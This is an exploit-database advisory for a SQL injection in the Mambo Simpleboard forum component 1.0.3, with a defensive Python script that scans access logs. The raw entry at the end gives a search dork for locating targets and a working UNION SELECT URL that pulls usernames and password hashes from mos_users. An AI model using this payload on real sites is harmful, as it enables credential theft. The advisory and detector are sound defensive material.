Vendor: Mambo Simpleboard Forum Component
By: Scipio, xcedz
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Mambo Simpleboard Forum Component
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:mambo:mambo_simpleboard_forum_component:1.0.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)

A SQL injection vulnerability exists in Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard). The proof-of-concept request below injects through the catid parameter of a func=view request. By sending a specially crafted HTTP request, an attacker can execute arbitrary SQL commands against the back-end database, bypass authentication, and gain access to unauthorized data.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to upgrade to the latest version.
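
One way to review web server access logs for requests shaped like the proof of concept on this page, as an added example that is not from the advisory or the component's code: it flags com_simpleboard requests whose catid is not a plain integer. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Prefix of an Apache/nginx "combined" access-log line: client, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# SQL tokens that have no business inside a numeric category id.
SQL_TOKENS = re.compile(r"\b(union|select|from|concat)\b|/\*|--", re.I)

def check_request(target):
    """Return None if the request is benign, otherwise (reason, decoded catid)."""
    query = parse_qs(urlsplit(target).query)  # decodes '+' and %xx before inspection
    if "com_simpleboard" not in query.get("option", []):
        return None  # other components are out of scope for this check
    for value in query.get("catid", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # a legitimate category id is a plain non-negative integer
        reason = "sql-tokens" if SQL_TOKENS.search(value) else "non-numeric"
        return reason, value
    return None

def scan(lines):
    """Return [(client, status, reason, catid), ...] for suspicious log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target, status = m.groups()
        hit = check_request(target)
        if hit:
            findings.append((client, int(status), *hit))
    return findings

# Constructed sample log lines (documentation IP ranges); the second carries the page's request.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Feb/2008:10:01:12 +0000] "GET /index.php?option=com_simpleboard&func=view&catid=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Feb/2008:10:02:40 +0000] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 200 734',
    '203.0.113.9 - - [27/Feb/2008:10:03:05 +0000] "GET /index.php?option=com_simpleboard&func=view&catid=12abc HTTP/1.1" 200 610',
    '198.51.100.7 - - [27/Feb/2008:10:04:00 +0000] "GET /index.php?option=com_content&catid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, status, reason, catid in scan(SAMPLE_LOG):
        print(f"{client} status={status} {reason}: {catid[:60]}")
```

A flagged request on a host still running 1.0.3 is a reason to treat the accounts in mos_users as exposed and rotate their passwords after upgrading.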

Exploit-DB raw data:

#########################################################
##
##  Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)
##
##
##  Author: it's my, Scipio, xcedz
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_simpleboard"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*

#########################################################
## Together, we have strength =) ####    www.antichat.ru
#########################################################

# milw0rm.com [2008-02-27]